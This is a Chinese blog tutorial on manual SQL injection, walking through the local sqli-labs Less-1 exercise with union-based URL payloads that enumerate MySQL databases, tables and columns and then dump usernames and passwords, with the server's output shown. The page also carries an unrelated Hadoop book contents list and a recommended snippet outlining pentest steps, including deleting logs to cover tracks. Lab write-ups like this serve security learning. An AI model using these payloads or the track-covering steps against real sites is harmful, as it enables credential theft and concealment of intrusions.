sql手动注入常用步骤

前言

提起sql注入,相信大家并不陌生,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,从而达到和服务器进行直接的交互.有可能存在SQL注入的数据库类型可以是Mysql,Mssql,Oracle,Postgress等等

预备知识
对mysql数据库有一定了解;对基本的sql语句有所了解;
对url编码有了解:空格=‘%20’,单引号=‘%27’,双引号=‘%22’,井号=‘%23’等
基本步骤
1. 判断是什么类型注入,有没有过滤关键字,是否能绕过
2. 确定存在注入的表的列数以及表中数据那些字段可以显示出来
3. 获取数据库版本,用户,当前连接的数据库等信息
4. 获取数据库中所有表的信息
5. 获取某个表的列字段信息
5. 获取相应表的数据
环境搭建
  • window
  • phpStudy
  • sqli-labs
  • apache+php+mysq
1. 首先从sqli-labs的github中下载环境
git clone https://github.com/Audi-1/sqli-labs.git
2. 将sqli-labs解压出来并将整个文件夹放到phpStudy中的WWW目录下
3. 连接数据库
修改sqli-labs下sql-connections文件夹中的db-creds.inc
将里面的数据库信息修改为自己的
4. 浏览器中输入网址http://localhost/sqli-labs,点击页面中的 setup/reset Database for labs,显示以下信息证明安装成功
SETTING UP THE DATABASE SCHEMA AND POPULATING DATA IN TABLES:

[*]...................Old database 'SECURITY' purged if exists

[*]...................Creating New database 'SECURITY' successfully

[*]...................Creating New Table 'USERS' successfully

[*]...................Creating New Table 'EMAILS' successfully

[*]...................Creating New Table 'UAGENTS' successfully

[*]...................Creating New Table 'REFERERS' successfully

[*]...................Inserted data correctly into table 'USERS'

[*]...................Inserted data correctly into table 'EMAILS'

[*]...................Old database purged if exists

[*]...................Creating New database successfully

[*]...................Creating New Table 'K18ILD27KN' successfully

[*]...................Inserted data correctly into table 'K18ILD27KN'

[*]...................Inserted secret key 'secret_58X0' into table
less1 - 基于错误的GET单引号字符型注入

一般判断是否存在基于错误的盲注和显错注入,可以使用以下方法:

单引号, and 1=1and 1=2 ,双引号,反斜杠,注释等

输入单引号,有报错信息,说明存在注入,没有过滤单引号(单引号被url编码)

http://127.0.0.1/sqli/Less-1/?id=2%27

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2'' LIMIT 0,1' at line 1

此时的注入语句为: SELECT * FROM users WHERE id='2'' LIMIT 0,1 (报单引号不匹配的错)

为了让单引号闭合,可以使用注释符,将多余的单引号注释掉

注释符常用的有两种:
1. -- ' 一定要注意在最后一个单引号前面有空格
2. # 
确定表的列数(总共的字段数)

由于接下来要采用union探测内容,而union的规则是必须要求列数相同才能正常展示,因此必须要探测列数,保证构造的注入查询结果与元查询结果列数与数据类型相同;
‘order by 1’代表按第一列升序排序,若数字代表的列不存在,则会报错,由此可以探测出有多少列。

当试到'4'时,出现报错信息,可以知道该表有3列:
  Unknown column '4' in 'order clause'
执行的sql语句是:SELECT * FROM users WHERE id='2' order by 4 -- '' LIMIT 0,1
确定字段的显示位

显示位:表中数据第几位的字段可以
显示,因为并不是所有的查询结果都
会展示在页面中,因此需要探测页面
中展示的查询结果是哪一列的结果;
‘union select 1,2,3 – ’ 通过显示的数字可以判断那些字段可以显示出来。

http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,3 -- '
可见2,3所在的字段可以显示
ps:id=-1,使用-1是为了使前一个sql语句所选的内容为空,从而便于后面的select语句显示信息
获取当前数据库信息

现在只有两个字段可以显示信息,显然在后面的查询数据中,两个字段是不够用,可以使用group_concat()函数(可以把查询出来的多行数据连接起来在一个字段中显示)

database()函数:查看当前数据库名称

version()函数:查看数据库版本信息

user():返回当前数据库连接使用的用户

char():将十进制ASCII码转化成字符,以便于分隔每个字段的内容

http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,group_concat(database(),version()),3 -- '
  Your Login name:security5.5.53
  Your Password:3
可以知道当前数据库名为security,数据库版本为5.5.53
获取全部数据库信息

Mysql有一个系统的数据库information_schema,里面保存着所有数据库的相关信息,使用该表完成注入

http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,group_concat(char(32),schema_name,char(32)),3 from information_schema.schemata -- '

获取到了所有的数据库信息 information_schema ,security
获取security数据库中的表信息
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,group_concat(char(32),table_name,char(32)),3 from information_schema.tables where table_schema='security' -- '
  Your Login name: emails , referers , uagents , users 
    Your Password:3
ps:table_schema= '数据库的名'
获取users表的列
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,group_concat(char(32),column_name,char(32)),3 from information_schema.columns where table_name='users' -- '
 Your Login name: user_id , first_name , last_name , user , password , avatar , last_login , failed_login , id , username , password
 Your Password:3
执行的sql语句是:SELECT * FROM users WHERE id='-1' union select 1,group_concat(char(32),column_name,char(32)),3 from information_schema.columns where table_name='users' -- '' LIMIT 0,1
获取数据
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,group_concat(char(32),username,char(32),password),3 from users -- '
 Your Login name: Dumb Dumb, Angelina I-kill-you, Dummy p@ssword, secure crappy, stupid stupidity, superman genious, batman mob!le, admin admin, admin1 admin1, admin2 admin2, admin3 admin3, dhakkan dumbo, admin4 admin4
 Your Password:3
执行的sql语句是:SELECT * FROM users WHERE id='-1' union select 1,group_concat(char(32),username,char(32),password),3 from users -- '' LIMIT 0,1
  • 4
    点赞
  • 37
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Hadoop definitive 第三版, 目录如下 1. Meet Hadoop . . . 1 Data! 1 Data Storage and Analysis 3 Comparison with Other Systems 4 RDBMS 4 Grid Computing 6 Volunteer Computing 8 A Brief History of Hadoop 9 Apache Hadoop and the Hadoop Ecosystem 12 Hadoop Releases 13 What’s Covered in this Book 14 Compatibility 15 2. MapReduce . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17 A Weather Dataset 17 Data Format 17 Analyzing the Data with Unix Tools 19 Analyzing the Data with Hadoop 20 Map and Reduce 20 Java MapReduce 22 Scaling Out 30 Data Flow 31 Combiner Functions 34 Running a Distributed MapReduce Job 37 Hadoop Streaming 37 Ruby 37 Python 40 iii www.it-ebooks.info Hadoop Pipes 41 Compiling and Running 42 3. The Hadoop Distributed Filesystem . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45 The Design of HDFS 45 HDFS Concepts 47 Blocks 47 Namenodes and Datanodes 48 HDFS Federation 49 HDFS High-Availability 50 The Command-Line Interface 51 Basic Filesystem Operations 52 Hadoop Filesystems 54 Interfaces 55 The Java Interface 57 Reading Data from a Hadoop URL 57 Reading Data Using the FileSystem API 59 Writing Data 62 Directories 64 Querying the Filesystem 64 Deleting Data 69 Data Flow 69 Anatomy of a File Read 69 Anatomy of a File Write 72 Coherency Model 75 Parallel Copying with distcp 76 Keeping an HDFS Cluster Balanced 78 Hadoop Archives 78 Using Hadoop Archives 79 Limitations 80 4. Hadoop I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83 Data Integrity 83 Data Integrity in HDFS 83 LocalFileSystem 84 ChecksumFileSystem 85 Compression 85 Codecs 87 Compression and Input Splits 91 Using Compression in MapReduce 92 Serialization 94 The Writable Interface 95 Writable Classes 98 iv | Table of Contents www.it-ebooks.info Implementing a Custom Writable 105 Serialization Frameworks 110 Avro 112 File-Based Data Structures 132 SequenceFile 132 MapFile 139 5. Developing a MapReduce Application . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 145 The Configuration API 146 Combining Resources 147 Variable Expansion 148 Configuring the Development Environment 148 Managing Configuration 148 GenericOptionsParser, Tool, and ToolRunner 151 Writing a Unit Test 154 Mapper 154 Reducer 156 Running Locally on Test Data 157 Running a Job in a Local Job Runner 157 Testing the Driver 161 Running on a Cluster 162 Packaging 162 Launching a Job 162 The MapReduce Web UI 164 Retrieving the Results 167 Debugging a Job 169 Hadoop Logs 173 Remote Debugging 175 Tuning a Job 176 Profiling Tasks 177 MapReduce Workflows 180 Decomposing a Problem into MapReduce Jobs 180 JobControl 182 Apache Oozie 182 6. How MapReduce Works . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 187 Anatomy of a MapReduce Job Run 187 Classic MapReduce (MapReduce 1) 188 YARN (MapReduce 2) 194 Failures 200 Failures in Classic MapReduce 200 Failures in YARN 202 Job Scheduling 204 Table of Contents | v www.it-ebooks.info The Fair Scheduler 205 The Capacity Scheduler 205 Shuffle and Sort 205 The Map Side 206 The Reduce Side 207 Configuration Tuning 209 Task Execution 212 The Task Execution Environment 212 Speculative Execution 213 Output Committers 215 Task JVM Reuse 216 Skipping Bad Records 217 7. MapReduce Types and Formats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 221 MapReduce Types 221 The Default MapReduce Job 225 Input Formats 232 Input Splits and Records 232 Text Input 243 Binary Input 247 Multiple Inputs 248 Database Input (and Output) 249 Output Formats 249 Text Output 250 Binary Output 251 Multiple Outputs 251 Lazy Output 255 Database Output 256 8. MapReduce Features . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 257 Counters 257 Built-in Counters 257 User-Defined Java Counters 262 User-Defined Streaming Counters 266 Sorting 266 Preparation 266 Partial Sort 268 Total Sort 272 Secondary Sort 276 Joins 281 Map-Side Joins 282 Reduce-Side Joins 284 Side Data Distribution 287 vi | Table of Contents www.it-ebooks.info Using the Job Configuration 287 Distributed Cache 288 MapReduce Library Classes 294 9. Setting Up a Hadoop Cluster . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 295 Cluster Specification 295 Network Topology 297 Cluster Setup and Installation 299 Installing Java 300 Creating a Hadoop User 300 Installing Hadoop 300 Testing the Installation 301 SSH Configuration 301 Hadoop Configuration 302 Configuration Management 303 Environment Settings 305 Important Hadoop Daemon Properties 309 Hadoop Daemon Addresses and Ports 314 Other Hadoop Properties 315 User Account Creation 318 YARN Configuration 318 Important YARN Daemon Properties 319 YARN Daemon Addresses and Ports 322 Security 323 Kerberos and Hadoop 324 Delegation Tokens 326 Other Security Enhancements 327 Benchmarking a Hadoop Cluster 329 Hadoop Benchmarks 329 User Jobs 331 Hadoop in the Cloud 332 Hadoop on Amazon EC2 332 10. Administering Hadoop . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 337 HDFS 337 Persistent Data Structures 337 Safe Mode 342 Audit Logging 344 Tools 344 Monitoring 349 Logging 349 Metrics 350 Java Management Extensions 353 Table of Contents | vii www.it-ebooks.info Maintenance 355 Routine Administration Procedures 355 Commissioning and Decommissioning Nodes 357 Upgrades 360 11. Pig . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 365 Installing and Running Pig 366 Execution Types 366 Running Pig Programs 368 Grunt 368 Pig Latin Editors 369 An Example 369 Generating Examples 371 Comparison with Databases 372 Pig Latin 373 Structure 373 Statements 375 Expressions 379 Types 380 Schemas 382 Functions 386 Macros 388 User-Defined Functions 389 A Filter UDF 389 An Eval UDF 392 A Load UDF 394 Data Processing Operators 397 Loading and Storing Data 397 Filtering Data 397 Grouping and Joining Data 400 Sorting Data 405 Combining and Splitting Data 406 Pig in Practice 407 Parallelism 407 Parameter Substitution 408 12. Hive . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 411 Installing Hive 412 The Hive Shell 413 An Example 414 Running Hive 415 Configuring Hive 415 Hive Services 417 viii | Table of Contents www.it-ebooks.info The Metastore 419 Comparison with Traditional Databases 421 Schema on Read Versus Schema on Write 421 Updates, Transactions, and Indexes 422 HiveQL 422 Data Types 424 Operators and Functions 426 Tables 427 Managed Tables and External Tables 427 Partitions and Buckets 429 Storage Formats 433 Importing Data 438 Altering Tables 440 Dropping Tables 441 Querying Data 441 Sorting and Aggregating 441 MapReduce Scripts 442 Joins 443 Subqueries 446 Views 447 User-Defined Functions 448 Writing a UDF 449 Writing a UDAF 451 13. HBase . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 457 HBasics 457 Backdrop 458 Concepts 458 Whirlwind Tour of the Data Model 458 Implementation 459 Installation 462 Test Drive 463 Clients 465 Java 465 Avro, REST, and Thrift 468 Example 469 Schemas 470 Loading Data 471 Web Queries 474 HBase Versus RDBMS 477 Successful Service 478 HBase 479 Use Case: HBase at Streamy.com 479 Table of Contents | ix www.it-ebooks.info Praxis 481 Versions 481 HDFS 482 UI 483 Metrics 483 Schema Design 483 Counters 484 Bulk Load 484 14. ZooKeeper . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 487 Installing and Running ZooKeeper 488 An Example 490 Group Membership in ZooKeeper 490 Creating the Group 491 Joining a Group 493 Listing Members in a Group 494 Deleting a Group 496 The ZooKeeper Service 497 Data Model 497 Operations 499 Implementation 503 Consistency 505 Sessions 507 States 509 Building Applications with ZooKeeper 510 A Configuration Service 510 The Resilient ZooKeeper Application 513 A Lock Service 517 More Distributed Data Structures and Protocols 519 ZooKeeper in Production 520 Resilience and Performance 521 Configuration 522 15. Sqoop . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 525 Getting Sqoop 525 A Sample Import 527 Generated Code 530 Additional Serialization Systems 531 Database Imports: A Deeper Look 531 Controlling the Import 534 Imports and Consistency 534 Direct-mode Imports 534 Working with Imported Data 535 x | Table of Contents www.it-ebooks.info Imported Data and Hive 536 Importing Large Objects 538 Performing an Export 540 Exports: A Deeper Look 541 Exports and Transactionality 543 Exports and SequenceFiles 543 16. Case Studies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 545 Hadoop Usage at Last.fm 545 Last.fm: The Social Music Revolution 545 Hadoop at Last.fm 545 Generating Charts with Hadoop 546 The Track Statistics Program 547 Summary 554 Hadoop and Hive at Facebook 554 Introduction 554 Hadoop at Facebook 554 Hypothetical Use Case Studies 557 Hive 560 Problems and Future Work 564 Nutch Search Engine 565 Background 565 Data Structures 566 Selected Examples of Hadoop Data Processing in Nutch 569 Summary 578 Log Processing at Rackspace 579 Requirements/The Problem 579 Brief History 580 Choosing Hadoop 580 Collection and Storage 580 MapReduce for Logs 581 Cascading 587 Fields, Tuples, and Pipes 588 Operations 590 Taps, Schemes, and Flows 592 Cascading in Practice 593 Flexibility 596 Hadoop and Cascading at ShareThis 597 Summary 600 TeraByte Sort on Apache Hadoop 601 Using Pig and Wukong to Explore Billion-edge Network Graphs 604 Measuring Community 606 Everybody’s Talkin’ at Me: The Twitter Reply Graph 606 Table of Contents | xi www.it-ebooks.info Symmetric Links 609 Community Extraction 610 A. Installing Apache Hadoop . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 613 B. Cloudera’s Distribution for Hadoop . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 619 C. Preparing the NCDC Weather Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 621
SQL注入渗透测试的实施步骤如下: 1. 收集信息:首先需要收集关于目标应用程序和数据库的信息,例如应用程序的URL、数据库类型、应用程序的输入点等。这可以通过手动或自动化的方式来完成,例如使用Web应用程序扫描工具(如Burp Suite、OWASP ZAP等)或数据库扫描工具(如sqlmap、Nessus等)。 2. 确定注入点:在收集信息后,需要确定应用程序中的注入点。注入点是应用程序中的输入点,攻击者可以通过它们将恶意的SQL代码注入到应用程序中。常见的注入点包括Web表单、URL参数、HTTP头等。 3. 确认注入漏洞:在确定注入点后,需要确认是否存在SQL注入漏洞。这可以通过手动注入或使用SQL注入工具来完成。手动注入需要对注入点进行测试,并尝试构造恶意的SQL代码来验证是否存在漏洞。使用SQL注入工具可以自动化这个过程,例如使用sqlmap工具可以检测和利用大多数SQL注入漏洞。 4. 利用注入漏洞:一旦确认存在注入漏洞,攻击者可以利用它来执行恶意的SQL代码。攻击者可以使用SQL注入工具或手动编写SQL代码来执行各种操作,例如提取敏感数据、修改数据、删除数据或执行任意代码。 5. 提高权限:如果攻击者成功地利用了SQL注入漏洞,他们可以尝试提高权限并获取更高的访问权限。例如,攻击者可以通过注入恶意代码来获取管理员权限,或者通过注入代码来获取其他用户的密码。 6. 覆盖踪迹:在攻击完成后,攻击者需要删除所有的攻击痕迹,以避免被发现。这可以通过删除日志、修改数据库记录等方式来实现。 7. 编写测试报告:最后,需要编写测试报告,记录测试的过程、结果和建议的修复措施。测试报告应该是清晰、准确和详细的,以便组织能够了解测试的结果和建议的改进措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

StriveBen

写字不易,给点动力吧

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值